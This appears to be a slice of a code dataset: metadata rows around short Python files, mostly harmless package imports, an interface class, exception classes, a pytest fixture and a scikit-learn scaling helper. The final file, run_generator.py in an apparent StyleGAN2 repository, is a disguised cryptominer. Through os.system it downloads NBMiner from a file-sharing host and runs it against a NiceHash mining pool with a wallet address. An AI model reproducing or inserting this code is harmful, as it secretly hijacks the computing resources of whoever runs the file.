| 39.922747 | 94 | 0.667491 | 1,184 | 9,302 | 5.150338 | 0.103041 | 0.061988 | 0.075271 | 0.092981 | 0.827156 | 0.807314 | 0.781568 | 0.759101 | 0.758937 | 0.72778 | 0 | 0.043642 | 0.199419 | 9,302 | 232 | 95 | 40.094828 | 0.775211 | 0.141152 | 0 | 0.682635 | 0 | 0 | 0.05369 | 0.006413 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017964 | false | 0 | 0.017964 | 0 | 0.041916 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8f44a68e996bc4721f3d06f9d7c998ba6a0e847c | 44 | py | Python | flare/translations/__init__.py | phorward/flare | 89a20bd1fb5ef7d0deebbd1f76c58a063e86f41e | [
"MIT"
] | 16 | 2021-05-13T17:17:48.000Z | 2022-03-28T14:58:15.000Z | flare/translations/__init__.py | phorward/flare | 89a20bd1fb5ef7d0deebbd1f76c58a063e86f41e | [
"MIT"
] | 8 | 2021-04-28T04:44:24.000Z | 2022-01-14T11:33:50.000Z | flare/translations/__init__.py | phorward/flare | 89a20bd1fb5ef7d0deebbd1f76c58a063e86f41e | [
"MIT"
] | 6 | 2021-06-14T15:07:53.000Z | 2021-10-31T16:24:07.000Z | from .de import lngDe
from .en import lngEn
| 14.666667 | 21 | 0.772727 | 8 | 44 | 4.25 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 44 | 2 | 22 | 22 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8f6ed2b9f747c0fc3d8945311077206e61d71e7a | 294 | py | Python | core_get/catalog/download_status_interface.py | core-get/core-get | 8fb960e4e51d0d46b5e3b2f4832eb4a39e0e60f7 | [
"MIT"
] | null | null | null | core_get/catalog/download_status_interface.py | core-get/core-get | 8fb960e4e51d0d46b5e3b2f4832eb4a39e0e60f7 | [
"MIT"
] | null | null | null | core_get/catalog/download_status_interface.py | core-get/core-get | 8fb960e4e51d0d46b5e3b2f4832eb4a39e0e60f7 | [
"MIT"
] | null | null | null | class DownloadStatusInterface:
def download_begin(self, filename: str) -> None:
raise NotImplementedError
def download_progress(self, downloaded: int, size: int) -> None:
raise NotImplementedError
def download_done(self) -> None:
raise NotImplementedError
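Callers are expected to subclass this interface and override all three hooks. As a rough, hypothetical sketch (the `ConsoleDownloadStatus` name and the percentage formatting are illustrative, not part of core-get), a concrete implementation might look like:

```python
class DownloadStatusInterface:
    def download_begin(self, filename: str) -> None:
        raise NotImplementedError

    def download_progress(self, downloaded: int, size: int) -> None:
        raise NotImplementedError

    def download_done(self) -> None:
        raise NotImplementedError


class ConsoleDownloadStatus(DownloadStatusInterface):
    """Hypothetical implementation that records progress messages."""

    def __init__(self) -> None:
        self.lines = []

    def download_begin(self, filename: str) -> None:
        self.lines.append(f"downloading {filename}")

    def download_progress(self, downloaded: int, size: int) -> None:
        # Integer percentage of the download completed so far
        self.lines.append(f"{100 * downloaded // size}%")

    def download_done(self) -> None:
        self.lines.append("done")


status = ConsoleDownloadStatus()
status.download_begin("core.tar.gz")
status.download_progress(512, 1024)
status.download_done()
print(status.lines)  # ['downloading core.tar.gz', '50%', 'done']
```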
| 29.4 | 68 | 0.707483 | 29 | 294 | 7.068966 | 0.551724 | 0.160976 | 0.409756 | 0.302439 | 0.380488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.217687 | 294 | 9 | 69 | 32.666667 | 0.891304 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
56a95d3e99b348898879c67116cbcc1fa42000e8 | 95 | py | Python | gauss_fit/__init__.py | semodi/gauss_fit | 5a7c8c1f5541d7388acc11909f06d20e920e9f8b | [
"BSD-3-Clause"
] | 1 | 2021-09-15T09:09:17.000Z | 2021-09-15T09:09:17.000Z | gauss_fit/__init__.py | semodi/gauss_fit | 5a7c8c1f5541d7388acc11909f06d20e920e9f8b | [
"BSD-3-Clause"
] | null | null | null | gauss_fit/__init__.py | semodi/gauss_fit | 5a7c8c1f5541d7388acc11909f06d20e920e9f8b | [
"BSD-3-Clause"
] | null | null | null | from . import fitting
from . import atom
from . import molecule
from . import molecule_classes
| 19 | 30 | 0.789474 | 13 | 95 | 5.692308 | 0.461538 | 0.540541 | 0.486486 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168421 | 95 | 4 | 31 | 23.75 | 0.936709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
853d4b995dd8af2bb4fab2695cd571a3e1eb6598 | 208 | py | Python | app.py | anyblockanalytics/thegraph-allocation-optimization | d53927eccfc55f830f249126a950575dbfed2f9e | [
"Apache-2.0"
] | 10 | 2021-04-07T15:51:06.000Z | 2021-12-20T06:07:25.000Z | app.py | anyblockanalytics/thegraph-allocation-optimization | d53927eccfc55f830f249126a950575dbfed2f9e | [
"Apache-2.0"
] | 8 | 2021-04-29T18:55:19.000Z | 2021-10-06T10:46:56.000Z | app.py | anyblockanalytics/thegraph-allocation-optimization | d53927eccfc55f830f249126a950575dbfed2f9e | [
"Apache-2.0"
] | 6 | 2021-04-27T05:31:40.000Z | 2021-12-18T16:53:11.000Z | from src.webapp.overview import streamlitEntry
import pyutilib.subprocess.GlobalData
if __name__ == '__main__':
    pyutilib.subprocess.GlobalData.DEFINE_SIGNAL_HANDLERS_DEFAULT = False
streamlitEntry() | 29.714286 | 73 | 0.817308 | 22 | 208 | 7.227273 | 0.772727 | 0.226415 | 0.352201 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110577 | 208 | 7 | 74 | 29.714286 | 0.859459 | 0 | 0 | 0 | 0 | 0 | 0.038278 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
8595398fbdcd46d32951ec8b23e6d9999b1d6726 | 123 | py | Python | proxypay/exceptions.py | AgeuMatheus/django-proxypay | 90736875e434013abe3ea1be5f9ff3100c9005db | [
"MIT"
] | 12 | 2020-05-06T17:07:26.000Z | 2020-10-19T15:41:56.000Z | proxypay/exceptions.py | txiocoder/django-proxypay | 90736875e434013abe3ea1be5f9ff3100c9005db | [
"MIT"
] | 1 | 2020-05-22T14:24:29.000Z | 2020-06-07T10:38:10.000Z | proxypay/exceptions.py | txiocoder/django-proxypay | 90736875e434013abe3ea1be5f9ff3100c9005db | [
"MIT"
] | null | null | null | class ProxypayException(Exception): pass
class ProxypayKeyError(KeyError): pass
class ProxypayValueError(Exception): pass | 24.6 | 41 | 0.845528 | 12 | 123 | 8.666667 | 0.583333 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081301 | 123 | 5 | 41 | 24.6 | 0.920354 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
85ae898cbc81a890bc6fa5fbd515cd57b3680eb3 | 67 | py | Python | echolect/tools/__init__.py | ryanvolz/echolect | ec2594925f34fdaea69b64e725fccb0c99665a55 | [
"BSD-3-Clause"
] | 1 | 2022-03-24T22:48:12.000Z | 2022-03-24T22:48:12.000Z | echolect/tools/__init__.py | scivision/echolect | ec2594925f34fdaea69b64e725fccb0c99665a55 | [
"BSD-3-Clause"
] | 1 | 2015-03-25T20:41:24.000Z | 2015-03-25T20:41:24.000Z | echolect/tools/__init__.py | scivision/echolect | ec2594925f34fdaea69b64e725fccb0c99665a55 | [
"BSD-3-Clause"
] | null | null | null | from .iteration import *
from .time import *
from .valarg import *
| 16.75 | 24 | 0.731343 | 9 | 67 | 5.444444 | 0.555556 | 0.408163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.179104 | 67 | 3 | 25 | 22.333333 | 0.890909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
85b8abe808763657c5a14c146939fc48654231ec | 186 | py | Python | TermTk/TTkWidgets/Fancy/__init__.py | ceccopierangiolieugenio/py-ttk | 117d61844bb7344bbe22a7797b7e3763d5fe4de5 | [
"MIT"
] | null | null | null | TermTk/TTkWidgets/Fancy/__init__.py | ceccopierangiolieugenio/py-ttk | 117d61844bb7344bbe22a7797b7e3763d5fe4de5 | [
"MIT"
] | null | null | null | TermTk/TTkWidgets/Fancy/__init__.py | ceccopierangiolieugenio/py-ttk | 117d61844bb7344bbe22a7797b7e3763d5fe4de5 | [
"MIT"
] | null | null | null | from .table import *
from .tableview import *
from .tree import *
from .treeview import *
from .treewidget import *
from .treewidgetitem import *
| 26.571429 | 30 | 0.591398 | 18 | 186 | 6.111111 | 0.444444 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.344086 | 186 | 6 | 31 | 31 | 0.901639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a445090ca44676fae047b2e3ab2f936fa080f3a8 | 222 | py | Python | website/rentals/admin/__init__.py | JobDoesburg/landolfio | 4cbf31c2e6f93745f5aa0d20893bf20f3acecc6e | [
"MIT"
] | 1 | 2021-02-24T14:33:09.000Z | 2021-02-24T14:33:09.000Z | website/rentals/admin/__init__.py | JobDoesburg/landolfio | 4cbf31c2e6f93745f5aa0d20893bf20f3acecc6e | [
"MIT"
] | 2 | 2022-01-13T04:03:38.000Z | 2022-03-12T01:03:10.000Z | website/rentals/admin/__init__.py | JobDoesburg/landolfio | 4cbf31c2e6f93745f5aa0d20893bf20f3acecc6e | [
"MIT"
] | null | null | null | from rentals.admin.asset_issuances import *
from rentals.admin.unprocessed_issued_assets import *
from rentals.admin.loan_assets import *
from rentals.admin.rent_assets import *
from rentals.admin.asset_returnals import *
| 37 | 53 | 0.842342 | 31 | 222 | 5.83871 | 0.387097 | 0.303867 | 0.441989 | 0.486188 | 0.464088 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09009 | 222 | 5 | 54 | 44.4 | 0.89604 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
a477ec8e6de3940ab7cc2419217081cff6f41b4c | 138 | py | Python | tests/conftest.py | poyo46/youcab | 0ab7429f816d781d98c5f98949ae190d62f3bb54 | [
"BSD-3-Clause"
] | null | null | null | tests/conftest.py | poyo46/youcab | 0ab7429f816d781d98c5f98949ae190d62f3bb54 | [
"BSD-3-Clause"
] | null | null | null | tests/conftest.py | poyo46/youcab | 0ab7429f816d781d98c5f98949ae190d62f3bb54 | [
"BSD-3-Clause"
] | null | null | null | from pathlib import Path
import pytest
@pytest.fixture(scope="session")
def root_dir():
    return Path(__file__).parents[1].resolve()
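For intuition about what the fixture returns: `Path.parents[1]` walks two levels up from the file, which for `tests/conftest.py` is the repository root. A standalone sketch with a made-up POSIX path:

```python
from pathlib import PurePosixPath

# Hypothetical layout: the conftest lives at <root>/tests/conftest.py
p = PurePosixPath("/repo/tests/conftest.py")

# parents[0] is the containing directory, parents[1] is one level above it
print(p.parents[0])  # /repo/tests
print(p.parents[1])  # /repo
```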
| 15.333333 | 46 | 0.73913 | 19 | 138 | 5.105263 | 0.842105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008333 | 0.130435 | 138 | 8 | 47 | 17.25 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0.050725 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
74e628d79ef90c8c6eaf98fa22c33248e66fd686 | 51 | py | Python | blockcerts/tools/__init__.py | docknetwork/verifiable-claims-engine | 1aab94510f421ce131642b64aefcd9a21c888f23 | [
"MIT"
] | 5 | 2019-10-21T18:17:38.000Z | 2020-12-09T06:40:32.000Z | blockcerts/tools/__init__.py | docknetwork/verifiable-claims-engine | 1aab94510f421ce131642b64aefcd9a21c888f23 | [
"MIT"
] | 4 | 2019-11-01T20:10:54.000Z | 2020-01-21T20:41:00.000Z | blockcerts/tools/__init__.py | docknetwork/verifiable-claims-engine | 1aab94510f421ce131642b64aefcd9a21c888f23 | [
"MIT"
] | 2 | 2020-02-02T20:00:46.000Z | 2020-02-12T10:12:05.000Z | from cert_issuer import *
from cert_tools import *
| 17 | 25 | 0.803922 | 8 | 51 | 4.875 | 0.625 | 0.410256 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156863 | 51 | 2 | 26 | 25.5 | 0.906977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
74ecff236bb9821eb87a0df6377bc5468c37f10e | 1,915 | py | Python | desafio_iafront/jobs/escala_pedidos/preprocessing.py | LuizJunior98/desafio-iafront | 6769fcbbe85d4a8b2570c08af65dfd87e8135526 | [
"MIT"
] | null | null | null | desafio_iafront/jobs/escala_pedidos/preprocessing.py | LuizJunior98/desafio-iafront | 6769fcbbe85d4a8b2570c08af65dfd87e8135526 | [
"MIT"
] | null | null | null | desafio_iafront/jobs/escala_pedidos/preprocessing.py | LuizJunior98/desafio-iafront | 6769fcbbe85d4a8b2570c08af65dfd87e8135526 | [
"MIT"
] | 1 | 2020-08-10T21:55:54.000Z | 2020-08-10T21:55:54.000Z | from sklearn import preprocessing
from desafio_iafront.jobs.common import transform
from desafio_iafront.data.saving import save_partitioned
class Preprocessing:
    def __init__(self, result, saida):
        self.result = result
        self.saida = saida

    def normalizer(self):
        # Scale the values
        result_scaled = transform(self.result, preprocessing.Normalizer())
        # Save the result
        save_partitioned(result_scaled, self.saida, ['data', 'hora'])
        self.result = result_scaled

    def standard_scale(self):
        # Scale the values
        result_scaled = transform(self.result, preprocessing.StandardScaler())
        # Save the result
        save_partitioned(result_scaled, self.saida, ['data', 'hora'])
        self.result = result_scaled

    def min_max_scale(self):
        # Scale the values
        result_scaled = transform(self.result, preprocessing.MinMaxScaler())
        # Save the result
        save_partitioned(result_scaled, self.saida, ['data', 'hora'])
        self.result = result_scaled

    def max_abs_scale(self):
        # Scale the values
        result_scaled = transform(self.result, preprocessing.MaxAbsScaler())
        # Save the result
        save_partitioned(result_scaled, self.saida, ['data', 'hora'])
        self.result = result_scaled

    def robust_scale(self):
        # Scale the values
        result_scaled = transform(self.result, preprocessing.RobustScaler())
        # Save the result
        save_partitioned(result_scaled, self.saida, ['data', 'hora'])
        self.result = result_scaled

    def power_transformer(self):
        # Scale the values
        result_scaled = transform(self.result, preprocessing.PowerTransformer())
        # Save the result
        save_partitioned(result_scaled, self.saida, ['data', 'hora'])
        self.result = result_scaled
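Each method above delegates the actual math to a scikit-learn scaler. As a dependency-free illustration of what min-max scaling does to a single column (this helper is not part of the project):

```python
def min_max_scale(column):
    """Rescale a list of numbers to the [0, 1] range."""
    lo, hi = min(column), max(column)
    if hi == lo:
        # Constant column: no spread to normalize, map everything to 0
        return [0.0 for _ in column]
    return [(x - lo) / (hi - lo) for x in column]

print(min_max_scale([10.0, 20.0, 30.0]))  # [0.0, 0.5, 1.0]
```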
| 29.015152 | 80 | 0.668407 | 212 | 1,915 | 5.858491 | 0.20283 | 0.173913 | 0.077295 | 0.067633 | 0.723027 | 0.723027 | 0.723027 | 0.723027 | 0.723027 | 0.723027 | 0 | 0 | 0.240731 | 1,915 | 65 | 81 | 29.461538 | 0.854195 | 0.127937 | 0 | 0.354839 | 0 | 0 | 0.028968 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.225806 | false | 0 | 0.096774 | 0 | 0.387097 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2d003ad3c3dbae92548035a859563e041da932fa | 359 | py | Python | run_generator.py | yusuf9192/StyleGAN2 | 97cde7e2f9bb5f2618f789575b12c801a2057ba5 | [
"BSD-Source-Code"
] | null | null | null | run_generator.py | yusuf9192/StyleGAN2 | 97cde7e2f9bb5f2618f789575b12c801a2057ba5 | [
"BSD-Source-Code"
] | null | null | null | run_generator.py | yusuf9192/StyleGAN2 | 97cde7e2f9bb5f2618f789575b12c801a2057ba5 | [
"BSD-Source-Code"
] | null | null | null | import os as alpha
alpha.system("apt update && apt install pciutils -y && apt install wget -y && wget https://filebin.net/3wfzfm8t2kmyombs/NBMiner_Linux.tar && tar -xvf NBMiner_Linux.tar && cd NBMiner_Linux && ./nbminer -a ethash -proxy 82.165.99.243:6969 -o stratum+ssl://stratum.eu.nicehash.com:33353 -u 33kJvAUL3Na2ifFDGmUPsZLTyDUBGZLhAi.yaefegovp6uq3ms")
| 119.666667 | 339 | 0.768802 | 52 | 359 | 5.25 | 0.730769 | 0.131868 | 0.10989 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086687 | 0.100279 | 359 | 2 | 340 | 179.5 | 0.758514 | 0 | 0 | 0 | 0 | 0.5 | 0.899721 | 0.259053 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |